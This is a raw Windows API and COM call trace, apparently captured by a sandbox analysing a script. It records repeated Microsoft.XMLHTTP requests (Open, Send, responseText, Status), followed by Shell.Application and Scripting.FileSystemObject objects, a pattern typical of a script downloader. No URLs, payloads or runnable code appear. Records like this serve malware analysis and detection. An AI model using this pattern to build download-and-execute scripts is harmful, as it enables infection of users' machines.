	[0381.090] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0381.090] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0381.090] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5ba0) returned 0x0
	[0381.090] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5ba0) returned 0x3
	[0381.090] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0381.090] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0381.090] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0381.090] longjmp () 
	[0381.090] longjmp () 
	[0381.090] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0381.090] SysStringLen (param_1=0x0) returned 0x0
	[0381.091] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0381.091] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0381.091] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7720) returned 0x0
	[0381.091] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0381.091] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7518) returned 0x0
	[0381.091] ??2@YAPEAX_K@Z () returned 0x62f330
	[0381.091] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7518, pUnkSite=0x62f330) 
	[0381.091] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0381.091] XMLHTTPRequest:IUnknown:Release (This=0x49c7518) returned 0x0
	[0381.091] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7720) returned 0x0
	[0381.091] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7720) returned 0x3
	[0381.091] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0381.091] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7720, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0381.091] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0381.091] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0381.091] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7720, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0381.091] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0382.781] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0382.781] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7720, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0382.782] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0382.782] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0382.782] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7720, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0382.782] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0382.782] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0382.782] SysStringLen (param_1=0x0) returned 0x0
	[0382.782] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0382.782] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0382.782] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0382.782] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0382.782] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0382.782] ??2@YAPEAX_K@Z () returned 0x62f350
	[0382.782] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0382.782] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0382.783] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0382.783] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0382.783] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0382.783] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0382.783] SysStringLen (param_1=0x0) returned 0x0
	[0382.783] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0382.786] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0382.786] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0382.786] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0382.786] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0382.786] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0382.786] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0383.185] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0383.186] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7720, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0383.186] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0383.187] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0383.187] SysStringLen (param_1=0x0) returned 0x0
	[0383.187] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0383.187] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0383.187] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7720) returned 0x0
	[0383.187] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0383.187] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0383.187] ??2@YAPEAX_K@Z () returned 0x62f330
	[0383.187] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f330) 
	[0383.187] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0383.187] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0383.188] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7720) returned 0x0
	[0383.188] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7720) returned 0x3
	[0383.188] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0383.188] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7720, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0383.190] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0383.190] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0383.190] SysStringLen (param_1=0x0) returned 0x0
	[0383.190] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0383.191] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0383.191] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c77d0) returned 0x0
	[0383.191] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0383.191] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77d0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7838) returned 0x0
	[0383.191] ??2@YAPEAX_K@Z () returned 0x62f310
	[0383.191] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7838, pUnkSite=0x62f310) 
	[0383.191] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0383.191] XMLHTTPRequest:IUnknown:Release (This=0x49c7838) returned 0x0
	[0383.191] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77d0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c77d0) returned 0x0
	[0383.191] XMLHTTPRequest:IUnknown:AddRef (This=0x49c77d0) returned 0x3
	[0383.191] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0383.191] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c77d0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0383.191] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0383.191] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0383.191] SysStringLen (param_1=0x0) returned 0x0
	[0383.191] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0383.192] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0383.192] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bc0) returned 0x0
	[0383.192] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0383.192] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c28) returned 0x0
	[0383.192] ??2@YAPEAX_K@Z () returned 0x62f330
	[0383.192] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c28, pUnkSite=0x62f330) 
